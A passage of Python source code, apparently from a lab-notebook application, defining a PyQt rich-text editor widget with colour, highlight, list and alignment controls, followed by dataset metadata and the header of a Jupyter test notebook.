common.HIGHLIGHT_COLOR['yellow'].color, common.HIGHLIGHT_COLOR['yellow'].dark_shade)\n self.act_yellow_highlight.setIcon(yellow_highlight_icon)\n\n self.act_green_highlight = QAction(\"Green\", self)\n green_highlight_icon = self.draw_color(\n common.HIGHLIGHT_COLOR['green'].color, common.HIGHLIGHT_COLOR['green'].dark_shade)\n self.act_green_highlight.setIcon(green_highlight_icon)\n\n self.act_blue_highlight = QAction(\"Blue\", self)\n blue_highlight_icon = self.draw_color(\n common.HIGHLIGHT_COLOR['blue'].color, common.HIGHLIGHT_COLOR['blue'].dark_shade)\n self.act_blue_highlight.setIcon(blue_highlight_icon)\n\n self.act_purple_highlight = QAction(\"Purple\", self)\n purple_highlight_icon = self.draw_color(\n common.HIGHLIGHT_COLOR['purple'].color, common.HIGHLIGHT_COLOR['purple'].dark_shade)\n self.act_purple_highlight.setIcon(purple_highlight_icon)\n\n self.act_gray_highlight = QAction(\"Gray\", self)\n gray_highlight_icon = self.draw_color(\n common.HIGHLIGHT_COLOR['gray'].color, common.HIGHLIGHT_COLOR['gray'].dark_shade)\n self.act_gray_highlight.setIcon(gray_highlight_icon)\n\n self.highlight_menu = QMenu(self)\n self.highlight_menu.addAction(self.act_clear_highlight)\n self.highlight_menu.addAction(self.act_red_highlight)\n self.highlight_menu.addAction(self.act_orange_highlight)\n self.highlight_menu.addAction(self.act_yellow_highlight)\n self.highlight_menu.addAction(self.act_green_highlight)\n self.highlight_menu.addAction(self.act_blue_highlight)\n self.highlight_menu.addAction(self.act_purple_highlight)\n self.highlight_menu.addAction(self.act_gray_highlight)\n self.btn_highlight.setMenu(self.highlight_menu)\n\n # Text color menu\n self.act_black_text = QAction(\"Black\", self)\n black_text_icon = self.draw_color(common.TEXT_COLOR['black'].color, common.TEXT_COLOR['black'].dark_shade)\n self.act_black_text.setIcon(black_text_icon)\n\n self.act_gray_text = QAction(\"Gray\", self)\n gray_text_icon = self.draw_color(common.TEXT_COLOR['gray'].color, common.TEXT_COLOR['gray'].dark_shade)\n self.act_gray_text.setIcon(gray_text_icon)\n\n self.act_red_text = QAction(\"Red\", self)\n red_text_icon = self.draw_color(common.TEXT_COLOR['red'].color, common.TEXT_COLOR['red'].dark_shade)\n self.act_red_text.setIcon(red_text_icon)\n\n self.act_orange_text = QAction(\"Orange\", self)\n orange_text_icon = self.draw_color(common.TEXT_COLOR['orange'].color, common.TEXT_COLOR['orange'].dark_shade)\n self.act_orange_text.setIcon(orange_text_icon)\n\n self.act_yellow_text = QAction(\"Yellow\", self)\n yellow_text_icon = self.draw_color(common.TEXT_COLOR['yellow'].color, common.TEXT_COLOR['yellow'].dark_shade)\n self.act_yellow_text.setIcon(yellow_text_icon)\n\n self.act_green_text = QAction(\"Green\", self)\n green_text_icon = self.draw_color(common.TEXT_COLOR['green'].color, common.TEXT_COLOR['green'].dark_shade)\n self.act_green_text.setIcon(green_text_icon)\n\n self.act_blue_text = QAction(\"Blue\", self)\n blue_text_icon = self.draw_color(common.TEXT_COLOR['blue'].color, common.TEXT_COLOR['blue'].dark_shade)\n self.act_blue_text.setIcon(blue_text_icon)\n\n self.act_purple_text = QAction(\"Purple\", self)\n purple_text_icon = self.draw_color(common.TEXT_COLOR['purple'].color, common.TEXT_COLOR['purple'].dark_shade)\n self.act_purple_text.setIcon(purple_text_icon)\n\n self.color_menu = QMenu(self)\n self.color_menu.addAction(self.act_black_text)\n self.color_menu.addAction(self.act_gray_text)\n self.color_menu.addAction(self.act_red_text)\n self.color_menu.addAction(self.act_orange_text)\n self.color_menu.addAction(self.act_yellow_text)\n self.color_menu.addAction(self.act_green_text)\n self.color_menu.addAction(self.act_blue_text)\n self.color_menu.addAction(self.act_purple_text)\n self.btn_color.setMenu(self.color_menu)\n\n # List menu\n self.act_no_list = QAction(\"No list\", self)\n self.act_bullet_list = QAction(\"• Bullet\", self)\n self.act_numbered_list = QAction(\"1. Numbered\", self)\n self.act_roman_list = QAction(\"I. Roman numbered\", self)\n self.act_uppercase_list = QAction(\"A. Uppercase letters\", self)\n self.act_lowercase_list = QAction(\"a. Lowercase letters\", self)\n self.act_increase_indent = QAction(\"Increase indentation\")\n self.act_decrease_indent = QAction(\"Decrease indentation\")\n\n self.list_menu = QMenu(self)\n self.list_menu.addAction(self.act_no_list)\n self.list_menu.addAction(self.act_bullet_list)\n self.list_menu.addAction(self.act_numbered_list)\n self.list_menu.addAction(self.act_roman_list)\n self.list_menu.addAction(self.act_uppercase_list)\n self.list_menu.addAction(self.act_lowercase_list)\n self.list_menu.addSeparator()\n self.list_menu.addAction(self.act_increase_indent)\n self.list_menu.addAction(self.act_decrease_indent)\n\n self.btn_list.setMenu(self.list_menu)\n\n # Align button\n self.btn_left.setIcon(self.draw_left())\n self.btn_center.setIcon(self.draw_center())\n self.btn_right.setIcon(self.draw_right())\n self.btn_justify.setIcon(self.draw_justify())\n\n # Set style sheet\n stylesheet.set_style_sheet(self, \":/StyleSheet/Widget/style-sheet/widget/widget/text_editor.qss\")\n stylesheet.set_style_sheet(self.icon_frame,\n \":/StyleSheet/Widget/style-sheet/widget/widget/text_editor_button_frame.qss\")\n\n # Superscript button text\n text = QTextDocument()\n text.setHtml(\"

X 2

\")\n\n pixmap = self.draw_text(text)\n icon = QIcon(pixmap)\n self.btn_superscript.setIcon(icon)\n self.btn_superscript.setIconSize(pixmap.rect().size() / self.devicePixelRatioF())\n\n # Subscript button text\n text = QTextDocument()\n text.setHtml(\"

X 2

\")\n\n pixmap = self.draw_text(text)\n icon = QIcon(pixmap)\n self.btn_subscript.setIcon(icon)\n self.btn_subscript.setIconSize(pixmap.rect().size() / self.devicePixelRatioF())\n\n # Default color icons\n self.change_highlight_button_icon(self.act_clear_highlight)\n self.change_text_color_button_icon(self.act_black_text)\n self.change_list_button_icon(self.act_no_list)\n\n # Set visible components and event filter\n self.icon_frame.setVisible(False)\n self.txt_title.installEventFilter(self)\n self.txt_body.installEventFilter(self)\n self.txt_description.setVisible(False)\n\n def init_connection(self):\n self.btn_bold.clicked.connect(self.format_bold)\n self.btn_italic.clicked.connect(self.format_italic)\n self.btn_underline.clicked.connect(self.format_underline)\n self.btn_strikethrough.clicked.connect(self.format_strikethrough)\n self.btn_superscript.clicked.connect(self.format_superscript)\n self.btn_subscript.clicked.connect(self.format_subscript)\n self.highlight_menu.triggered.connect(self.change_highlight_button_icon)\n self.color_menu.triggered.connect(self.change_text_color_button_icon)\n self.list_menu.triggered.connect(self.change_list_button_icon)\n self.list_menu.triggered.connect(self.format_list)\n self.color_menu.triggered.connect(self.format_text_color)\n self.highlight_menu.triggered.connect(self.format_highlight)\n self.style_menu.triggered.connect(self.format_style)\n self.txt_body.cursorPositionChanged.connect(self.update_button)\n self.txt_width.textEdited.connect(self.update_height)\n self.txt_height.textEdited.connect(self.update_width)\n self.txt_width.editingFinished.connect(self.update_image_size)\n self.btn_left.clicked.connect(self.format_align_left)\n self.btn_right.clicked.connect(self.format_align_right)\n self.btn_center.clicked.connect(self.format_align_center)\n self.btn_justify.clicked.connect(self.format_align_justify)\n\n def update_height(self):\n \"\"\" Update height value when the width is changed \"\"\"\n if self.txt_width.text():\n self.txt_height.setText(\"{:.0f}\".format(int(self.txt_width.text()) * 1/self.width_height_ratio))\n else:\n self.txt_height.setText(\"0\")\n\n def update_width(self):\n \"\"\" Update width value when the height is changed \"\"\"\n if self.txt_height.text():\n self.txt_width.setText(\"{:.0f}\".format(int(self.txt_height.text()) * self.width_height_ratio))\n else:\n self.txt_width.setText(\"0\")\n\n def update_image_size(self):\n cursor = self.txt_body.textCursor()\n\n if not cursor.hasSelection():\n cursor.setPosition(self.txt_body.textCursor().position() - 1)\n cursor.setPosition(self.txt_body.textCursor().position(), QTextCursor.KeepAnchor)\n\n fmt = cursor.charFormat().toImageFormat()\n fmt.setWidth(int(self.txt_width.text()))\n fmt.setHeight(int(self.txt_height.text()))\n cursor.setCharFormat(fmt)\n self.txt_body.setTextCursor(cursor)\n\n def eventFilter(self, object, event):\n if event.type() == QEvent.FocusIn:\n if object == self.txt_title:\n self.edit_title()\n if object == self.txt_body:\n self.edit_body()\n return QWidget.eventFilter(self, object, event)\n\n def edit_title(self):\n \"\"\" Show the interface element required to edit title \"\"\"\n self.icon_frame.setVisible(False)\n self.txt_description.setVisible(True)\n self.txt_key.setVisible(True)\n\n def edit_body(self):\n \"\"\" Show the interface element required to edit the body \"\"\"\n self.icon_frame.setVisible(True)\n self.txt_description.setVisible(False)\n self.txt_key.setVisible(False)\n\n def change_list_button_icon(self, action):\n \"\"\"Change the list button icon to the selected list format\n\n :param action: Selected action.\n :type action: QAction\n \"\"\"\n\n # Ignore the indent change action when changing the icon type\n if not (action == self.act_increase_indent or action == self.act_decrease_indent):\n if action == self.act_bullet_list:\n icon = self.draw_list([\"•\", \"•\", \"•\"])\n elif action == self.act_numbered_list:\n icon = self.draw_list([\"1.\", \"2.\", \"3.\"])\n elif action == self.act_roman_list:\n icon = self.draw_list([\"I.\", \"II.\", \"III.\"])\n elif action == self.act_uppercase_list:\n icon = self.draw_list([\"A.\", \"B.\", \"C.\"])\n else:\n icon = self.draw_list([\"a.\", \"b.\", \"c.\"])\n self.btn_list.setIcon(icon)\n\n # Do no check the button is no list is selected\n if not (action == self.act_no_list):\n self.btn_list.setChecked(True)\n elif action == self.act_no_list:\n self.btn_list.setChecked(False)\n\n def draw_list(self, separator_list):\n \"\"\"Draw the list icons for the icon menu\n\n .. note::\n This function handle HiDPI as well a regular screen\n\n :param separator_list: List of the bullets\n :type separator_list: List[str]\n :returns: QPixmap -- Icon pixmap\n \"\"\"\n # Create a base pixmap\n # Set the pixmap pixel ratio so that the image looks good in normal as well as HiDPI screens\n dpr = self.devicePixelRatioF()\n pixmap = QPixmap(16 * dpr, 16 * dpr)\n pixmap.setDevicePixelRatio(dpr)\n pixmap.fill(Qt.transparent) # Required to create a transparent background\n\n # Paint the elements of the icon\n painter = QPainter(pixmap)\n painter.setFont(QFont(self.font().family(), 5, 50))\n pen = QPen(QColor(72, 72, 72), 1)\n painter.setPen(pen)\n painter.drawLine(7, 3, 15, 3)\n painter.drawText(0, 0, 32, 22, Qt.AlignLeft, separator_list[0])\n painter.drawLine(7, 8, 15, 8)\n painter.drawText(0, 5, 32, 22, Qt.AlignLeft, separator_list[1])\n painter.drawLine(7, 13, 15, 13)\n painter.drawText(0, 10, 32, 22, Qt.AlignLeft, separator_list[2])\n painter.end()\n\n return QIcon(pixmap)\n\n def draw_left(self):\n \"\"\" Draw the icon for the align left button \"\"\"\n dpr = self.devicePixelRatioF()\n pixmap = QPixmap(16 * dpr, 16 * dpr)\n pixmap.setDevicePixelRatio(dpr)\n pixmap.fill(Qt.transparent) # Required to create a transparent background\n\n # Paint the elements of the icon\n painter = QPainter(pixmap)\n pen = QPen(QColor(72, 72, 72), 1)\n painter.setPen(pen)\n painter.drawLine(2, 3, 15, 3)\n painter.drawLine(2, 6, 11, 6)\n painter.drawLine(2, 9, 15, 9)\n painter.drawLine(2, 12, 13, 12)\n painter.end()\n\n return QIcon(pixmap)\n\n def draw_center(self):\n \"\"\" Draw the icon for the align left button \"\"\"\n dpr = self.devicePixelRatioF()\n pixmap = QPixmap(16 * dpr, 16 * dpr)\n pixmap.setDevicePixelRatio(dpr)\n pixmap.fill(Qt.transparent) # Required to create a transparent background\n\n # Paint the elements of the icon\n painter = QPainter(pixmap)\n pen = QPen(QColor(72, 72, 72), 1)\n painter.setPen(pen)\n painter.drawLine(2, 3, 15, 3)\n painter.drawLine(5, 6, 11, 6)\n painter.drawLine(2, 9, 15, 9)\n painter.drawLine(4, 12, 13, 12)\n painter.end()\n\n return QIcon(pixmap)\n\n def draw_right(self):\n \"\"\" Draw the icon for the align left button \"\"\"\n dpr = self.devicePixelRatioF()\n pixmap = QPixmap(16 * dpr, 16 * dpr)\n pixmap.setDevicePixelRatio(dpr)\n pixmap.fill(Qt.transparent) # Required to create a transparent background\n\n # Paint the elements of the icon\n painter = QPainter(pixmap)\n pen = QPen(QColor(72, 72, 72), 1)\n painter.setPen(pen)\n painter.drawLine(3, 3, 15, 3)\n painter.drawLine(6, 6, 15, 6)\n painter.drawLine(2, 9, 15, 9)\n painter.drawLine(4, 12, 15, 12)\n painter.end()\n\n return QIcon(pixmap)\n\n def draw_justify(self):\n \"\"\" Draw the icon for the align left button \"\"\"\n dpr = self.devicePixelRatioF()\n pixmap = QPixmap(16 * dpr, 16 * dpr)\n pixmap.setDevicePixelRatio(dpr)\n pixmap.fill(Qt.transparent) # Required to create a transparent background\n\n # Paint the elements of the icon\n painter = QPainter(pixmap)\n pen = QPen(QColor(72, 72, 72), 1)\n painter.setPen(pen)\n painter.drawLine(2, 3, 15, 3)\n painter.drawLine(2, 6, 15, 6)\n painter.drawLine(2, 9, 15, 9)\n painter.drawLine(2, 12, 15, 12)\n painter.end()\n\n return QIcon(pixmap)\n\n def change_text_color_button_icon(self, action):\n \"\"\"Change the text color button icon to the selected color\n\n :param action: Selected action.\n :type action: QAction\n \"\"\"\n if action == self.act_gray_text:\n icon = self.draw_color(common.TEXT_COLOR['gray'].color, common.TEXT_COLOR['gray'].dark_shade)\n elif action == self.act_red_text:\n icon = self.draw_color(common.TEXT_COLOR['red'].color, common.TEXT_COLOR['red'].dark_shade)\n elif action == self.act_orange_text:\n icon = self.draw_color(common.TEXT_COLOR['orange'].color, common.TEXT_COLOR['orange'].dark_shade)\n elif action == self.act_yellow_text:\n icon = self.draw_color(common.TEXT_COLOR['yellow'].color, common.TEXT_COLOR['yellow'].dark_shade)\n elif action == self.act_green_text:\n icon = self.draw_color(common.TEXT_COLOR['green'].color, common.TEXT_COLOR['green'].dark_shade)\n elif action == self.act_blue_text:\n icon = self.draw_color(common.TEXT_COLOR['blue'].color, common.TEXT_COLOR['blue'].dark_shade)\n elif action == self.act_purple_text:\n icon = self.draw_color(common.TEXT_COLOR['purple'].color, common.TEXT_COLOR['purple'].dark_shade)\n else:\n icon = self.draw_color(common.TEXT_COLOR['black'].color, common.TEXT_COLOR['black'].dark_shade)\n self.btn_color.setIcon(icon)\n\n def change_highlight_button_icon(self, action):\n \"\"\"Change the highlight button icon to the selected color\n\n :param action: Selected action.\n :type action: QAction\n \"\"\"\n if action == self.act_red_highlight:\n icon = self.draw_color(common.HIGHLIGHT_COLOR['red'].color, common.HIGHLIGHT_COLOR['red'].dark_shade)\n elif action == self.act_orange_highlight:\n icon = self.draw_color(common.HIGHLIGHT_COLOR['orange'].color, common.HIGHLIGHT_COLOR['orange'].dark_shade)\n elif action == self.act_yellow_highlight:\n icon = self.draw_color(common.HIGHLIGHT_COLOR['yellow'].color, common.HIGHLIGHT_COLOR['yellow'].dark_shade)\n elif action == self.act_green_highlight:\n icon = self.draw_color(common.HIGHLIGHT_COLOR['green'].color, common.HIGHLIGHT_COLOR['green'].dark_shade)\n elif action == self.act_blue_highlight:\n icon = self.draw_color(common.HIGHLIGHT_COLOR['blue'].color, common.HIGHLIGHT_COLOR['blue'].dark_shade)\n elif action == self.act_purple_highlight:\n icon = self.draw_color(common.HIGHLIGHT_COLOR['purple'].color, common.HIGHLIGHT_COLOR['purple'].dark_shade)\n elif action == self.act_gray_highlight:\n icon = self.draw_color(common.HIGHLIGHT_COLOR['gray'].color, common.HIGHLIGHT_COLOR['gray'].dark_shade)\n else:\n icon = self.draw_color(common.HIGHLIGHT_COLOR['clear'].color, common.HIGHLIGHT_COLOR['clear'].dark_shade)\n self.btn_highlight.setIcon(icon)\n\n def draw_color(self, fill, border):\n \"\"\"Draw the color icons for the highlight and the text color menu\n\n :param fill: Fill color.\n :type fill: QColor\n :param border: Border color.\n :type border: QColor\n :returns: QPixmap -- Icon pixmap\n \"\"\"\n # Create a base pixmap\n # Set the pixmap pixel ratio so that the image looks good in normal as well as HiDPI screens\n dpr = self.devicePixelRatioF()\n pixmap = QPixmap(16 * dpr, 16 * dpr)\n pixmap.setDevicePixelRatio(dpr)\n pixmap.fill(Qt.transparent)\n\n # Paint the elements of the icon\n painter = QPainter(pixmap)\n painter.setRenderHint(QPainter.Antialiasing)\n path = QPainterPath()\n path.addRoundedRect(QRectF(2, 2, 12, 12), 2, 2)\n\n pen = QPen(border, 1)\n painter.setPen(pen)\n painter.fillPath(path, fill)\n painter.drawPath(path)\n painter.end()\n\n return QIcon(pixmap)\n\n def draw_text(self, text):\n \"\"\"Draw an icon from a html text and return it as a pixmap.\n\n .. note::\n This function handle HiDPI as well a regular screen.\n\n :param text: QTextDocument with HTML code for the icon.\n :type text: QTextDocument\n :returns: QPixmap -- Returns pixmap that can be used to create the icon\n\n .. note::\n Unlike the other drawing function, this function return a pixel map. As of now, this is required to create\n a good sized icon. This should therefore not be changed unless the the output icon size is right (it is\n currently too small).\n \"\"\"\n # Create a base pixmap\n # Set the pixmap pixel ratio so that the image looks good in normal as well as HiDPI screens\n dpr = self.devicePixelRatioF()\n pixmap = QPixmap(text.size().width() * dpr, text.size().height() * dpr)\n pixmap.setDevicePixelRatio(dpr)\n pixmap.fill(Qt.transparent)\n\n # Paint the elements of the icon\n painter = QPainter(pixmap)\n text.drawContents(painter, QRectF(pixmap.rect()))\n painter.end()\n\n return pixmap\n\n def merge_format_on_word_or_selection(self, fmt):\n \"\"\" Change the caracter format when a format button is pressed.\n\n The font is changed for the selection or from the cursor position.\n :param fmt: Text format\n \"\"\"\n cursor = self.txt_body.textCursor()\n cursor.mergeCharFormat(fmt)\n self.txt_body.mergeCurrentCharFormat(fmt)\n\n def format_bold(self):\n \"\"\" Set text format to bold. \"\"\"\n fmt = QTextCharFormat()\n if self.btn_bold.isChecked():\n fmt.setFontWeight(QFont.Bold)\n else:\n fmt.setFontWeight(QFont.Normal)\n self.merge_format_on_word_or_selection(fmt=fmt)\n\n def format_italic(self):\n \"\"\" Set text format to italic. \"\"\"\n fmt = QTextCharFormat()\n if self.btn_italic.isChecked():\n fmt.setFontItalic(True)\n else:\n fmt.setFontItalic(False)\n self.merge_format_on_word_or_selection(fmt=fmt)\n\n def format_underline(self):\n \"\"\" Set text format to underline. \"\"\"\n fmt = QTextCharFormat()\n if self.btn_underline.isChecked():\n fmt.setFontUnderline(True)\n else:\n fmt.setFontUnderline(False)\n self.merge_format_on_word_or_selection(fmt=fmt)\n\n def format_strikethrough(self):\n \"\"\" Set text format to strikethrough. \"\"\"\n fmt = QTextCharFormat()\n if self.btn_strikethrough.isChecked():\n fmt.setFontStrikeOut(True)\n else:\n fmt.setFontStrikeOut(False)\n self.merge_format_on_word_or_selection(fmt=fmt)\n\n def format_superscript(self):\n \"\"\" Set text vertical alignment to superscript. \"\"\"\n fmt = QTextCharFormat()\n if self.btn_superscript.isChecked():\n fmt.setVerticalAlignment(QTextCharFormat.AlignSuperScript)\n else:\n fmt.setVerticalAlignment(QTextCharFormat.AlignNormal)\n self.merge_format_on_word_or_selection(fmt=fmt)\n\n def format_subscript(self):\n \"\"\" Set text vertical alignment to subscript. \"\"\"\n fmt = QTextCharFormat()\n if self.btn_subscript.isChecked():\n fmt.setVerticalAlignment(QTextCharFormat.AlignSubScript)\n else:\n fmt.setVerticalAlignment(QTextCharFormat.AlignNormal)\n self.merge_format_on_word_or_selection(fmt=fmt)\n\n def format_align_left(self):\n \"\"\" Set text format to bold. \"\"\"\n if self.btn_left.isChecked():\n self.txt_body.setAlignment(Qt.AlignLeft)\n else:\n self.txt_body.setAlignment(Qt.AlignLeft)\n self.update_button()\n\n def format_align_right(self):\n \"\"\" Set text format to bold. \"\"\"\n if self.btn_left.isChecked():\n self.txt_body.setAlignment(Qt.AlignRight)\n else:\n self.txt_body.setAlignment(Qt.AlignLeft)\n self.update_button()\n\n def format_align_center(self):\n \"\"\" Set text format to bold. \"\"\"\n if self.btn_left.isChecked():\n self.txt_body.setAlignment(Qt.AlignCenter)\n else:\n self.txt_body.setAlignment(Qt.AlignLeft)\n self.update_button()\n\n def format_align_justify(self):\n \"\"\" Set text format to bold. \"\"\"\n if self.btn_left.isChecked():\n self.txt_body.setAlignment(Qt.AlignJustify)\n else:\n self.txt_body.setAlignment(Qt.AlignLeft)\n self.update_button()\n\n def format_list(self, action):\n \"\"\" set list format according to selected format\n\n :param action: Selected action.\n :type action: QAction\n \"\"\"\n\n # Create a new list\n if not (action == self.act_increase_indent or action == self.act_decrease_indent or action == self.act_no_list):\n # Set the list type format\n fmt = QTextListFormat()\n if action == self.act_bullet_list:\n fmt.setStyle(QTextListFormat.ListDisc)\n elif action == self.act_numbered_list:\n fmt.setStyle(QTextListFormat.ListDecimal)\n elif action == self.act_roman_list:\n fmt.setStyle(QTextListFormat.ListUpperRoman)\n elif action == self.act_uppercase_list:\n fmt.setStyle(QTextListFormat.ListUpperAlpha)\n else:\n fmt.setStyle(QTextListFormat.ListLowerAlpha)\n\n # Add the list to the the text edit\n cursor = self.txt_body.textCursor()\n cursor.createList(fmt)\n # Delete an existing list\n elif action == self.act_no_list:\n # Get the current list\n cursor = self.txt_body.textCursor()\n current_list = cursor.currentList()\n current_block = cursor.block()\n\n # Remove the list\n current_list.remove(current_block)\n\n # Restore indent\n fmt = cursor.blockFormat()\n fmt.setIndent(0)\n cursor.setBlockFormat(fmt)\n # Change the indent\n else:\n cursor = self.txt_body.textCursor()\n current_format = cursor.currentList().format()\n current_indent = current_format.indent()\n\n if action == self.act_increase_indent:\n new_indent = current_indent + 1\n else:\n new_indent = current_indent - 1\n\n new_format = current_format\n new_format.setIndent(new_indent)\n cursor.createList(new_format)\n\n def format_text_color(self, action):\n \"\"\" Set the text color\n\n :param action: Selected action.\n :type action: QAction\n \"\"\"\n if action == self.act_gray_text:\n text_color = QColor(117, 117, 117)\n elif action == self.act_red_text:\n text_color = QColor(150, 16, 16)\n elif action == self.act_orange_text:\n text_color = QColor(211, 116, 0)\n elif action == self.act_yellow_text:\n text_color = QColor(229, 221, 0)\n elif action == self.act_green_text:\n text_color = QColor(34, 139, 34)\n elif action == self.act_blue_text:\n text_color = QColor(18, 18, 130)\n elif action == self.act_purple_text:\n text_color = QColor(117, 21, 117)\n else:\n text_color = Qt.black\n\n fmt = QTextCharFormat()\n fmt.setForeground(QBrush(text_color))\n self.merge_format_on_word_or_selection(fmt=fmt)\n\n def format_highlight(self, action):\n \"\"\" Set the highlight color\n\n .. note::\n The highlight color alpha channel is set to 128 so the color are semi-transparent. This prevent the colors\n to be too harsh.\n\n :param action: Selected action.\n :type action: QAction\n \"\"\"\n fmt = QTextCharFormat()\n\n # Set the selected color to background\n if not action == self.act_clear_highlight:\n if action == self.act_red_highlight:\n highlight_color = QColor(242, 41, 74, 128)\n elif action == self.act_orange_highlight:\n highlight_color = QColor(252, 116, 42, 128)\n elif action == self.act_yellow_highlight:\n highlight_color = QColor(255, 251, 45, 128)\n elif action == self.act_green_highlight:\n highlight_color = QColor(0, 250, 154, 128)\n elif action == self.act_blue_highlight:\n highlight_color = QColor(49, 170, 226, 128)\n elif action == self.act_purple_highlight:\n highlight_color = QColor(155, 71, 229, 128)\n else:\n highlight_color = QColor(196, 196, 196, 128)\n\n fmt.setBackground(QBrush(highlight_color))\n # Remove the background\n else:\n fmt.setBackground(QBrush(Qt.white))\n self.merge_format_on_word_or_selection(fmt=fmt)\n\n def format_style(self, action):\n \"\"\" Set a predefined format on the selected text\n\n :param action: Selected action (format).\n :type action: QAction\n \"\"\"\n fmt = QTextCharFormat()\n\n # Define the format according to the selected style\n if action == self.act_part:\n fmt.setFontWeight(75)\n fmt.setFontPointSize(20)\n elif action == self.act_section:\n fmt.setFontWeight(75)\n fmt.setFontPointSize(16)\n elif action == self.act_subsection:\n fmt.setFontWeight(75)\n fmt.setFontPointSize(14)\n elif action == self.act_subsubsection:\n fmt.setFontWeight(75)\n fmt.setFontPointSize(13)\n elif action == self.act_body:\n fmt.setFontWeight(50)\n fmt.setFontPointSize(13)\n elif action == self.act_note:\n fmt.setFontWeight(50)\n fmt.setFontPointSize(10)\n\n # Define the format common to every style\n fmt.setForeground(QBrush(Qt.black))\n fmt.setBackground(QBrush(Qt.white))\n fmt.setFontItalic(False)\n fmt.setFontUnderline(False)\n fmt.setFontStrikeOut(False)\n fmt.setVerticalAlignment(QTextCharFormat.AlignNormal)\n\n self.merge_format_on_word_or_selection(fmt=fmt)\n\n def update_button(self):\n \"\"\" Set the button states to match the selected text format \"\"\"\n\n # Get text format\n cfmt = self.txt_body.textCursor().charFormat()\n\n # Bold button\n if cfmt.fontWeight() == 75:\n self.btn_bold.setChecked(True)\n else:\n self.btn_bold.setChecked(False)\n\n # Italic button\n if cfmt.fontItalic():\n self.btn_italic.setChecked(True)\n else:\n self.btn_italic.setChecked(False)\n\n # Underline button\n if cfmt.fontUnderline():\n self.btn_underline.setChecked(True)\n else:\n self.btn_underline.setChecked(False)\n\n # Strikethrough button\n if cfmt.fontStrikeOut():\n self.btn_strikethrough.setChecked(True)\n else:\n self.btn_strikethrough.setChecked(False)\n\n # Superscript button\n if cfmt.verticalAlignment() == QTextCharFormat.AlignSuperScript:\n self.btn_superscript.setChecked(True)\n else:\n self.btn_superscript.setChecked(False)\n\n # Subscript button\n if cfmt.verticalAlignment() == QTextCharFormat.AlignSubScript:\n self.btn_subscript.setChecked(True)\n else:\n self.btn_subscript.setChecked(False)\n\n # Get color format\n # Background color\n background_color = cfmt.background().color()\n if background_color.rgb() == common.HIGHLIGHT_COLOR['red'].color.rgb():\n self.change_highlight_button_icon(self.act_red_highlight)\n elif background_color.rgb() == common.HIGHLIGHT_COLOR['orange'].color.rgb():\n self.change_highlight_button_icon(self.act_orange_highlight)\n elif background_color.rgb() == common.HIGHLIGHT_COLOR['yellow'].color.rgb():\n self.change_highlight_button_icon(self.act_yellow_highlight)\n elif background_color.rgb() == common.HIGHLIGHT_COLOR['green'].color.rgb():\n self.change_highlight_button_icon(self.act_green_highlight)\n elif background_color.rgb() == common.HIGHLIGHT_COLOR['blue'].color.rgb():\n self.change_highlight_button_icon(self.act_blue_highlight)\n elif background_color.rgb() == common.HIGHLIGHT_COLOR['purple'].color.rgb():\n self.change_highlight_button_icon(self.act_purple_highlight)\n elif background_color.rgb() == common.HIGHLIGHT_COLOR['gray'].color.rgb():\n self.change_highlight_button_icon(self.act_gray_highlight)\n else:\n self.change_highlight_button_icon(self.act_clear_highlight)\n\n # Text color\n text_color = cfmt.foreground().color()\n\n if text_color == common.TEXT_COLOR['gray'].color:\n self.change_text_color_button_icon(self.act_gray_text)\n elif text_color == common.TEXT_COLOR['red'].color:\n self.change_text_color_button_icon(self.act_red_text)\n elif text_color == common.TEXT_COLOR['orange'].color:\n self.change_text_color_button_icon(self.act_orange_text)\n elif text_color == common.TEXT_COLOR['yellow'].color:\n self.change_text_color_button_icon(self.act_yellow_text)\n elif text_color == common.TEXT_COLOR['gray'].color:\n self.change_text_color_button_icon(self.act_gray_text)\n elif text_color == common.TEXT_COLOR['green'].color:\n self.change_text_color_button_icon(self.act_green_text)\n elif text_color == common.TEXT_COLOR['blue'].color:\n self.change_text_color_button_icon(self.act_blue_text)\n elif text_color == common.TEXT_COLOR['purple'].color:\n self.change_text_color_button_icon(self.act_purple_text)\n else:\n self.change_text_color_button_icon(self.act_black_text)\n\n # Get list format\n if self.txt_body.textCursor().currentList():\n self.btn_list.setChecked(True)\n else:\n self.btn_list.setChecked(False)\n\n if self.txt_body.is_image():\n fmt = self.txt_body.textCursor().charFormat().toImageFormat()\n self.txt_height.setText(\"{:d}\".format(int(fmt.height())))\n self.txt_width.setText(\"{:d}\".format(int(fmt.width())))\n self.width_height_ratio = fmt.width() / fmt.height()\n self.txt_width.setEnabled(True)\n self.txt_height.setEnabled(True)\n else:\n self.txt_width.setEnabled(False)\n self.txt_height.setEnabled(False)\n\n # Get align format\n if self.txt_body.alignment() == Qt.AlignLeft:\n self.btn_left.setChecked(True)\n else:\n self.btn_left.setChecked(False)\n\n if self.txt_body.alignment() == Qt.AlignCenter:\n self.btn_center.setChecked(True)\n else:\n self.btn_center.setChecked(False)\n\n if self.txt_body.alignment() == Qt.AlignRight:\n self.btn_right.setChecked(True)\n else:\n self.btn_right.setChecked(False)\n\n if self.txt_body.alignment() == Qt.AlignJustify:\n self.btn_justify.setChecked(True)\n else:\n self.btn_justify.setChecked(False)\n\n\nclass ProtocolTextEditor(TextEditor):\n def __init__(self, editor_type, tag_list, reference_list):\n super(ProtocolTextEditor, self).__init__(editor_type=editor_type, tag_list=tag_list, reference_list=reference_list)\n self.txt_key.setPlaceholderText(\"Protocol key\")\n self.txt_description.setPlaceholderText(\"Description of the protocol\")\n self.txt_title.setPlaceholderText(\"Untitled protocol\")\n\n\nclass ExperimentTextEditor(TextEditor):\n def __init__(self, tag_list, reference_list, dataset_list, protocol_list, key_list):\n super(ExperimentTextEditor, self).__init__(common.TYPE_EXPERIMENT, tag_list=tag_list,\n reference_list=reference_list,\n dataset_list=dataset_list, protocol_list=protocol_list)\n\n completer = QCompleter(key_list)\n self.txt_key.setCompleter(completer)\n\n # Remove the save button\n self.btn_save.deleteLater()\n sip.delete(self.save_layout)\n","sub_path":"labnote/interface/widget/widget.py","file_name":"widget.py","file_ext":"py","file_size_in_byte":64452,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"487744206","text":"# ---\n# jupyter:\n# jupytext:\n# formats: ipynb,py:light\n# text_representation:\n# extension: .py\n# format_name: light\n# format_version: '1.5'\n# jupytext_version: 1.11.2\n# kernelspec:\n# display_name: Python 3\n# language: python\n# name: python3\n# ---\n\n# + hide_input=false\n# Setup ipytest extension\ntry:\n ipy_str = str(type(get_ipython()))\n if 'zmqshell' in ipy_str or 'terminal' in ipy_str:\n import ipytest\n ipytest.autoconfig()\nexcept:\n pass\n\n\n# + 